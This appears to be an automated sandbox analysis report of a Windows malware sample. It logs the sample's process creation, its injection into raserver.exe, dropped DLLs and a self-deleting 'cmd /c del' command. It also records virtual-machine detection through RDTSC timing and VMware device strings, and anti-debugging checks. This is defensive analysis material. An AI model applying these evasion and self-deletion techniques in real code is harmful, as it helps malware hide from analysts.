Source: unknown	Process created: C:\Users\user\Desktop\lpdKSOB78u.exe 'C:\Users\user\Desktop\lpdKSOB78u.exe'
Source: unknown	Process created: C:\Users\user\Desktop\lpdKSOB78u.exe 'C:\Users\user\Desktop\lpdKSOB78u.exe'
Source: unknown	Process created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\lpdKSOB78u.exe'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Process created: C:\Users\user\Desktop\lpdKSOB78u.exe 'C:\Users\user\Desktop\lpdKSOB78u.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\lpdKSOB78u.exe'	Jump to behavior

Source: C:\Users\user\Desktop\lpdKSOB78u.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: lpdKSOB78u.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: MusNotifyIcon.pdb source: explorer.exe, 00000004.00000000.237237720.000000000F584000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: lpdKSOB78u.exe, 00000000.00000003.205218390.0000000002BF0000.00000004.00000001.sdmp, lpdKSOB78u.exe, 00000001.00000002.266056817.0000000000A8F000.00000040.00000001.sdmp, raserver.exe, 00000009.00000002.473551161.0000000004AA0000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: lpdKSOB78u.exe, raserver.exe
Source:	Binary string: RAServer.pdb source: lpdKSOB78u.exe, 00000001.00000002.265910985.0000000000950000.00000040.00000001.sdmp
Source:	Binary string: MusNotifyIcon.pdbGCTL source: explorer.exe, 00000004.00000000.237237720.000000000F584000.00000004.00000001.sdmp
Source:	Binary string: RAServer.pdbGCTL source: lpdKSOB78u.exe, 00000001.00000002.265910985.0000000000950000.00000040.00000001.sdmp

Data Obfuscation:

Source: C:\Users\user\Desktop\lpdKSOB78u.exe

Code function: 0_2_70481A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,

0_2_70481A98

Source: h1luljvls0ea.dll.0.dr

Static PE information: section name: .code

Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 0_2_70482F60 push eax; ret	0_2_70482F8E
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00416147 push esi; iretd	1_2_0041614A
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00416125 push ds; retf	1_2_0041612B
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_004153DC push es; retf	1_2_004153E5
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_0041B3F2 push eax; ret	1_2_0041B3F8
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_0041B3FB push eax; ret	1_2_0041B462
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00415B8C push ebp; ret	1_2_00415BD2
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_0041B3A5 push eax; ret	1_2_0041B3F8
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_0041B45C push eax; ret	1_2_0041B462
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00414E12 push ebx; ret	1_2_00414E14
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00414FCB pushfd ; iretd	1_2_00414FCC
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009ED0D1 push ecx; ret	1_2_009ED0E4
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_1_00416147 push esi; iretd	1_1_0041614A
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_1_00416125 push ds; retf	1_1_0041612B
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_1_004153DC push es; retf	1_1_004153E5
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_1_0041B3F2 push eax; ret	1_1_0041B3F8
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_1_0041B3FB push eax; ret	1_1_0041B462
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_1_00415B8C push ebp; ret	1_1_00415BD2
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_1_0041B3A5 push eax; ret	1_1_0041B3F8
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B1D0D1 push ecx; ret	9_2_04B1D0E4
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_00B06125 push ds; retf	9_2_00B0612B
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_00B06147 push esi; iretd	9_2_00B0614A
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_00B0B3A5 push eax; ret	9_2_00B0B3F8
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_00B05B8C push ebp; ret	9_2_00B05BD2
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_00B0B3F2 push eax; ret	9_2_00B0B3F8
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_00B0B3FB push eax; ret	9_2_00B0B462
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_00B053DC push es; retf	9_2_00B053E5
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_00B0B45C push eax; ret	9_2_00B0B462
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_00B04E12 push ebx; ret	9_2_00B04E14
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_00B04FCB pushfd ; iretd	9_2_00B04FCC

Source: initial sample

Static PE information: section name: .data entropy: 7.74690382322

Persistence and Installation Behavior:

Source: C:\Users\user\Desktop\lpdKSOB78u.exe	File created: C:\Users\user\AppData\Local\Temp\nsr575.tmp\System.dll			Jump to dropped file
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	File created: C:\Users\user\AppData\Local\Temp\h1luljvls0ea.dll			Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\lpdKSOB78u.exe	RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	RDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\raserver.exe	RDTSC instruction interceptor: First address: 0000000000AF85E4 second address: 0000000000AF85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\raserver.exe	RDTSC instruction interceptor: First address: 0000000000AF896E second address: 0000000000AF8974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\lpdKSOB78u.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Source: C:\Users\user\Desktop\lpdKSOB78u.exe

Code function: 1_2_004088A0 rdtsc

1_2_004088A0

Source: C:\Windows\explorer.exe TID: 4832	Thread sleep time: -60000s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe TID: 6468	Thread sleep time: -44000s >= -30000s			Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\raserver.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\raserver.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 0_2_00405A15 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_00405A15
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 0_2_004065C1 FindFirstFileA,FindClose,	0_2_004065C1
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 0_2_004027A1 FindFirstFileA,	0_2_004027A1

Source: explorer.exe, 00000004.00000000.232704653.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000004.00000000.232704653.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
Source: explorer.exe, 00000004.00000000.233719341.0000000008907000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}qqqqqqqqqqqqqq
Source: explorer.exe, 00000004.00000000.237000933.000000000F540000.00000004.00000001.sdmp	Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.231945952.0000000008640000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.230868572.0000000008220000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000004.00000002.483847310.00000000055D0000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
Source: explorer.exe, 00000004.00000000.232704653.000000000871F000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
Source: explorer.exe, 00000004.00000000.232704653.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000004.00000000.232804005.00000000087D1000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00ices
Source: explorer.exe, 00000004.00000000.225509168.0000000005603000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: explorer.exe, 00000004.00000000.230868572.0000000008220000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000004.00000000.230868572.0000000008220000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: lpdKSOB78u.exe, 00000000.00000002.211513573.0000000000808000.00000004.00000020.sdmp	Binary or memory string: ECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\>
Source: explorer.exe, 00000004.00000000.237000933.000000000F540000.00000004.00000001.sdmp	Binary or memory string: qeMusic
Source: explorer.exe, 00000004.00000000.230868572.0000000008220000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\lpdKSOB78u.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\lpdKSOB78u.exe

Code function: 1_2_004088A0 rdtsc

1_2_004088A0

Source: C:\Users\user\Desktop\lpdKSOB78u.exe

Code function: 1_2_00409B10 LdrLoadDll,

1_2_00409B10

Source: C:\Users\user\Desktop\lpdKSOB78u.exe

Code function: 0_2_70481A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,

0_2_70481A98

Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 0_2_703C47AD mov eax, dword ptr fs:[00000030h]	0_2_703C47AD
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 0_2_703C45AA mov eax, dword ptr fs:[00000030h]	0_2_703C45AA
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00999080 mov eax, dword ptr fs:[00000030h]	1_2_00999080
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009CF0BF mov ecx, dword ptr fs:[00000030h]	1_2_009CF0BF
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009CF0BF mov eax, dword ptr fs:[00000030h]	1_2_009CF0BF
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009CF0BF mov eax, dword ptr fs:[00000030h]	1_2_009CF0BF
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00A13884 mov eax, dword ptr fs:[00000030h]	1_2_00A13884
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00A13884 mov eax, dword ptr fs:[00000030h]	1_2_00A13884
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009D90AF mov eax, dword ptr fs:[00000030h]	1_2_009D90AF
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00A2B8D0 mov eax, dword ptr fs:[00000030h]	1_2_00A2B8D0
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00A2B8D0 mov ecx, dword ptr fs:[00000030h]	1_2_00A2B8D0
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00A2B8D0 mov eax, dword ptr fs:[00000030h]	1_2_00A2B8D0
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00A2B8D0 mov eax, dword ptr fs:[00000030h]	1_2_00A2B8D0
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00A2B8D0 mov eax, dword ptr fs:[00000030h]	1_2_00A2B8D0
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00A2B8D0 mov eax, dword ptr fs:[00000030h]	1_2_00A2B8D0
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009AB02A mov eax, dword ptr fs:[00000030h]	1_2_009AB02A
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009AB02A mov eax, dword ptr fs:[00000030h]	1_2_009AB02A
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009AB02A mov eax, dword ptr fs:[00000030h]	1_2_009AB02A
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009AB02A mov eax, dword ptr fs:[00000030h]	1_2_009AB02A
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00A64015 mov eax, dword ptr fs:[00000030h]	1_2_00A64015
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00A64015 mov eax, dword ptr fs:[00000030h]	1_2_00A64015
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00A17016 mov eax, dword ptr fs:[00000030h]	1_2_00A17016
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00A17016 mov eax, dword ptr fs:[00000030h]	1_2_00A17016
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00A17016 mov eax, dword ptr fs:[00000030h]	1_2_00A17016
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009B0050 mov eax, dword ptr fs:[00000030h]	1_2_009B0050
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009B0050 mov eax, dword ptr fs:[00000030h]	1_2_009B0050
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00A61074 mov eax, dword ptr fs:[00000030h]	1_2_00A61074
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00A52073 mov eax, dword ptr fs:[00000030h]	1_2_00A52073
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009CA185 mov eax, dword ptr fs:[00000030h]	1_2_009CA185
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009BC182 mov eax, dword ptr fs:[00000030h]	1_2_009BC182
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_0099B1E1 mov eax, dword ptr fs:[00000030h]	1_2_0099B1E1
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_0099B1E1 mov eax, dword ptr fs:[00000030h]	1_2_0099B1E1
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_0099B1E1 mov eax, dword ptr fs:[00000030h]	1_2_0099B1E1
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00999100 mov eax, dword ptr fs:[00000030h]	1_2_00999100
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00999100 mov eax, dword ptr fs:[00000030h]	1_2_00999100
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00999100 mov eax, dword ptr fs:[00000030h]	1_2_00999100
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009C513A mov eax, dword ptr fs:[00000030h]	1_2_009C513A
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009C513A mov eax, dword ptr fs:[00000030h]	1_2_009C513A
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009B4120 mov eax, dword ptr fs:[00000030h]	1_2_009B4120
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009B4120 mov eax, dword ptr fs:[00000030h]	1_2_009B4120
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009B4120 mov eax, dword ptr fs:[00000030h]	1_2_009B4120
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009B4120 mov eax, dword ptr fs:[00000030h]	1_2_009B4120
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009B4120 mov ecx, dword ptr fs:[00000030h]	1_2_009B4120
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009BB944 mov eax, dword ptr fs:[00000030h]	1_2_009BB944
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009BB944 mov eax, dword ptr fs:[00000030h]	1_2_009BB944
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_0099B171 mov eax, dword ptr fs:[00000030h]	1_2_0099B171
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_0099B171 mov eax, dword ptr fs:[00000030h]	1_2_0099B171
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009CD294 mov eax, dword ptr fs:[00000030h]	1_2_009CD294
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009CD294 mov eax, dword ptr fs:[00000030h]	1_2_009CD294
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009CFAB0 mov eax, dword ptr fs:[00000030h]	1_2_009CFAB0
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009952A5 mov eax, dword ptr fs:[00000030h]	1_2_009952A5
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009952A5 mov eax, dword ptr fs:[00000030h]	1_2_009952A5
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009952A5 mov eax, dword ptr fs:[00000030h]	1_2_009952A5
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009952A5 mov eax, dword ptr fs:[00000030h]	1_2_009952A5
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009952A5 mov eax, dword ptr fs:[00000030h]	1_2_009952A5
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00A4B260 mov eax, dword ptr fs:[00000030h]	1_2_00A4B260
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00A4B260 mov eax, dword ptr fs:[00000030h]	1_2_00A4B260
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00A68A62 mov eax, dword ptr fs:[00000030h]	1_2_00A68A62
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00999240 mov eax, dword ptr fs:[00000030h]	1_2_00999240
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00999240 mov eax, dword ptr fs:[00000030h]	1_2_00999240
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00999240 mov eax, dword ptr fs:[00000030h]	1_2_00999240
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00999240 mov eax, dword ptr fs:[00000030h]	1_2_00999240
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009D927A mov eax, dword ptr fs:[00000030h]	1_2_009D927A
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00A65BA5 mov eax, dword ptr fs:[00000030h]	1_2_00A65BA5
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009A1B8F mov eax, dword ptr fs:[00000030h]	1_2_009A1B8F
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009A1B8F mov eax, dword ptr fs:[00000030h]	1_2_009A1B8F
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00A4D380 mov ecx, dword ptr fs:[00000030h]	1_2_00A4D380
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00A5138A mov eax, dword ptr fs:[00000030h]	1_2_00A5138A
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00A5131B mov eax, dword ptr fs:[00000030h]	1_2_00A5131B
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_0099F358 mov eax, dword ptr fs:[00000030h]	1_2_0099F358
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_0099DB40 mov eax, dword ptr fs:[00000030h]	1_2_0099DB40
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009C3B7A mov eax, dword ptr fs:[00000030h]	1_2_009C3B7A
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009C3B7A mov eax, dword ptr fs:[00000030h]	1_2_009C3B7A
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_0099DB60 mov ecx, dword ptr fs:[00000030h]	1_2_0099DB60
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00A68B58 mov eax, dword ptr fs:[00000030h]	1_2_00A68B58
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00A514FB mov eax, dword ptr fs:[00000030h]	1_2_00A514FB
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00A68CD6 mov eax, dword ptr fs:[00000030h]	1_2_00A68CD6
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]	1_2_00A51C06
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]	1_2_00A51C06
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]	1_2_00A51C06
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]	1_2_00A51C06
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]	1_2_00A51C06
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]	1_2_00A51C06
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]	1_2_00A51C06
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]	1_2_00A51C06
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]	1_2_00A51C06
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]	1_2_00A51C06
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]	1_2_00A51C06
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]	1_2_00A51C06
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]	1_2_00A51C06
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00A51C06 mov eax, dword ptr fs:[00000030h]	1_2_00A51C06
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00A6740D mov eax, dword ptr fs:[00000030h]	1_2_00A6740D
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00A6740D mov eax, dword ptr fs:[00000030h]	1_2_00A6740D
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00A6740D mov eax, dword ptr fs:[00000030h]	1_2_00A6740D
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009CBC2C mov eax, dword ptr fs:[00000030h]	1_2_009CBC2C
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00A2C450 mov eax, dword ptr fs:[00000030h]	1_2_00A2C450
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00A2C450 mov eax, dword ptr fs:[00000030h]	1_2_00A2C450
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009B746D mov eax, dword ptr fs:[00000030h]	1_2_009B746D
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009CFD9B mov eax, dword ptr fs:[00000030h]	1_2_009CFD9B
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009CFD9B mov eax, dword ptr fs:[00000030h]	1_2_009CFD9B
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00992D8A mov eax, dword ptr fs:[00000030h]	1_2_00992D8A
